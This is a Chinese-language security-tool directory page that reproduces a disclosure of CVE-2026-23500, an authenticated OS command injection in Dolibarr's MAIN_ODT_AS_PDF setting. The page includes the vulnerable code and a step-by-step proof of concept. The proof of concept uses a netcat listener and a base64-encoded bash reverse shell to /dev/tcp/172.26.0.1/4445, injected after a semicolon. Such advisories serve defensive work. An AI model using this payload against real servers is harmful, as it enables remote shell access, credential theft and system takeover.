Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23500 — CVE-2026-23500 - Dolibarr 中通过 MAIN_ODT_AS_PDF 配置实现的操作系统命令注入(RCE) | Kitploit
工具/GitHubGitHub/lukasz-rybak/cve-2026-23500
漏洞分析漏洞利用Web应用程序漏洞利用命令与控制论文与研究学习与教育
GitHublukasz-rybak/cve-2026-23500

CVE-2026-23500

CVE-2026-23500 - Dolibarr 中通过 MAIN_ODT_AS_PDF 配置实现的操作系统命令注入(RCE)

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23500:Dolibarr 中通过 MAIN_ODT_AS_PDF 配置导致的 OS 命令注入(RCE)

概述

字段详情
CVE 编号CVE-2026-23500
严重性严重
安全公告GHSA-w5j3-8fcr-h87w
发现者Lukasz Rybak

受影响产品

  • Dolibarr/dolibarr(版本:<= 22.0.4)
  • 已修复版本: 23.0

CWE 分类

  • CWE-78:OS 命令中使用的特殊元素中和不当('OS 命令注入')

详细信息

摘要

已认证的管理员可以通过向 MAIN_ODT_AS_PDF 配置常量中注入恶意载荷来执行任意操作系统命令。该漏洞的存在是因为应用程序在将命令路径传递给 ODT 转 PDF 过程中的 exec() 函数之前,未能正确验证或转义该命令路径。

详情

该漏洞位于 htdocs/includes/odtphp/odf.php。 当系统尝试将 ODT 文档转换为 PDF 时(例如在提案、发票中),它会使用 MAIN_ODT_AS_PDF 全局设置构造一条 shell 命令。

代码片段(htdocs/includes/odtphp/odf.php,约第 930 行):

root@kitploit:~
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

虽然文件名 $name 通过 escapeshellcmd() 进行了清理,但配置变量 MAIN_ODT_AS_PDF 直接从数据库获取并拼接在字符串开头。具有管理权限的攻击者可以将该变量设置为包含命令分隔符(如 ;)及任意命令。

PoC

前提条件:

  1. 以管理员身份登录。
  2. 确保“商业提案”模块已启用,并在其设置中激活“ODT 模板”。

复现步骤(反向 Shell):

  1. 在攻击者机器上启动 netcat 监听器(IP:172.26.0.1,端口:4445):
root@kitploit:~
nc -lvnp 4445
  1. 准备载荷。为避免特殊字符(如 & 或 >)被 Web 应用程序或 shell 转义,请将反向 shell 命令编码为 Base64:

    root@kitploit:~
    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
    echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
    # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
    
  2. 导航到 首页 -> 设置 -> 其他设置。

  3. 使用以下注入载荷添加或修改常量 MAIN_ODT_AS_PDF:

    root@kitploit:~
    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
    

    (说明:jodconverter 用于通过初始检查,; 充当命令分隔符,管道会解码并执行 Base64 载荷)。

    图片
  4. 导航到 商务 -> 新建提案,创建草稿,选择 ODT 模板(例如 generic_proposal_odt),然后点击生成。

    图片
图片 图片
  1. 查看 netcat 监听器。将建立连接,在服务器上获得一个 shell:
图片

影响

远程代码执行(RCE)。 获得管理员账户访问权限的攻击者(或恶意管理员)可以以 Web 服务器用户(通常为 www-data)的权限在底层服务器上执行任意命令。这使得攻击者可以:

  • 读取敏感配置文件(数据库凭据)。
  • 修改应用程序代码。
  • 根据服务器配置实现完全系统接管(例如 Docker 逃逸、横向移动)。

致谢

由 Łukasz Rybak 报告

参考链接

  • https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23500

免责声明

该 CVE 已按照协同漏洞披露规范进行了负责任地披露。此处提供的信息仅用于教育和防御目的。

下载工具